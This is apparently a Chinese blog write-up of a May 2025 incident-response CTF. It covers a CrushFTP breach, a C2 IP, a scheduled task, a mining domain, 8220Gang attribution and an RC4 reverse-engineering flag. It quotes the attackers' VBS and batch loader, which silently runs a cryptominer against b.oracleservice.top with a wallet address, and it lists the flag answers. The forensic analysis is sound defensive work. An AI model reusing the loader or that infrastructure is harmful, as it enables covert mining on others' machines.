2025年Solar应急响应公益月赛-5月

2025年Solar应急响应公益月赛-5月

Aristore
  2025-05-31 18:20 2025-05-31 18:20 创建    519 字  2 分钟  

应急响应

攻击者使用什么漏洞获取了服务器的配置文件?

Challenge

某某文化有限公司的运维小王刚刚搭建服务器发现cpu莫名的异常的升高请你帮助小王排查一下服务器
pass:Ngy@667788
flag格式为:flag{CVE-2020-12345}

Solution

SolarIncidentResponse202505-4

在桌面发现应用CrushFTP,搜索发现这篇文章漏洞预警 | CrushFtp 认证绕过漏洞(CVE-2025-31161) | CTF导航

1
flag{CVE-2025-31161}

攻击者C2服务器IP是什么?

Challenge

flag格式为:flag{123.123.123.123}

Solution

查看日志,筛选事件ID5156

SolarIncidentResponse202505-5

1
flag{156.238.230.57}

系统每天晚上系统都会卡卡的帮小明找到问题出在了那?

Challenge

flag为配置名称(无空格)
flag{xxxxx}

Solution

SolarIncidentResponse202505-1

1
flag{sqlbackingup}

恶意域名是什么?

Challenge

flag格式为:flag{xxx.xxxxxxxx.xxx}

Solution

查看C:\Program Files\Microsoft SQL Server\90\Shared\sqlwsmprovhost.vbs内容如下:

1
2
set ws=createobject("wscript.shell")
ws.Run """sqlwscript.cmd""",0

这个脚本创建一个 WScript.Shell 对象并使用该对象的 Run 方法运行名为 sqlwscript.cmd 的批处理文件

查看 sqlwscript.cmd 内容如下:

1
2
3
4
5
@echo off
cd /d "%~dp0"
:start
sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0
goto start

找到域名

1
flag{b.oracleservice.top}

疑似是什么组织发动的攻击?

Challenge

flag格式为:flag{123XXX}(无空格注意大小写)

Solution

搜索上面的参数46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ

SolarIncidentResponse202505-2

发现组织叫做8220,进一步搜索8220

SolarIncidentResponse202505-3

1
flag{8220Gang}

Reverse

开源项目

Challenge

Solution

ConsoleApplication2/ConsoleApplication2.vcxproj中发现base64编码的字符串

1
JHRhcmdldCA9ICJMSERoMXgxemRJaVZTK2E1cVlKckJQYjBpeHFIVHhkK3VKLzN0Y2tVZE9xRyttbjExM0U9Ijskaz0iRml4ZWRLZXkxMjMhIjskZD1bU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKChSZWFkLUhvc3QgIui+k+WFpeWtl+espuS4siIpKTskcz0wLi4yNTU7JGo9MDswLi4yNTV8JXskaj0oJGorJHNbJF9dK1tieXRlXSRrWyRfJSRrLkxlbmd0aF0pJTI1Njskc1skX10sJHNbJGpdPSRzWyRqXSwkc1skX119OyRpPSRqPTA7JHI9QCgpOyRkfCV7JGk9KCRpKzEpJTI1Njskaj0oJGorJHNbJGldKSUyNTY7JHNbJGldLCRzWyRqXT0kc1skal0sJHNbJGldOyRyKz0kXy1ieG9yJHNbKCRzWyRpXSskc1skal0pJTI1Nl19OyBbU3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkcikgLWVxICR0YXJnZXQ=

解码得到

1
$target = "LHDh1x1zdIiVS+a5qYJrBPb0ixqHTxd+uJ/3tckUdOqG+mn113E=";$k="FixedKey123!";$d=[System.Text.Encoding]::UTF8.GetBytes((Read-Host "输入字符串"));$s=0..255;$j=0;0..255|%{$j=($j+$s[$_]+[byte]$k[$_%$k.Length])%256;$s[$_],$s[$j]=$s[$j],$s[$_]};$i=$j=0;$r=@();$d|%{$i=($i+1)%256;$j=($j+$s[$i])%256;$s[$i],$s[$j]=$s[$j],$s[$i];$r+=$_-bxor$s[($s[$i]+$s[$j])%256]}; [System.Convert]::ToBase64String($r) -eq $target

发现是RC4,密文是LHDh1x1zdIiVS+a5qYJrBPb0ixqHTxd+uJ/3tckUdOqG+mn113E=,密钥是FixedKey123!

解密得到flag

1
flag{rqweripqwe[rqwe[rjqw[eprjqweprij}
  • 标题: 2025年Solar应急响应公益月赛-5月
  • 作者: Aristore
  • 创建于 : 2025-05-31 18:20:00
  • 更新于 : 2025-06-04 19:50:36
  • 链接: https://www.aristore.top/posts/SolarIncidentResponse202505/
  • 版权声明: 版权所有 © Aristore,禁止转载。
评论
目录
2025年Solar应急响应公益月赛-5月
  1. 应急响应
    1. 攻击者使用什么漏洞获取了服务器的配置文件?
      1. Challenge
      2. Solution
    2. 攻击者C2服务器IP是什么?
      1. Challenge
      2. Solution
    3. 系统每天晚上系统都会卡卡的帮小明找到问题出在了那?
      1. Challenge
      2. Solution
    4. 恶意域名是什么?
      1. Challenge
      2. Solution
    5. 疑似是什么组织发动的攻击?
      1. Challenge
      2. Solution
  2. Reverse
    1. 开源项目
      1. Challenge
      2. Solution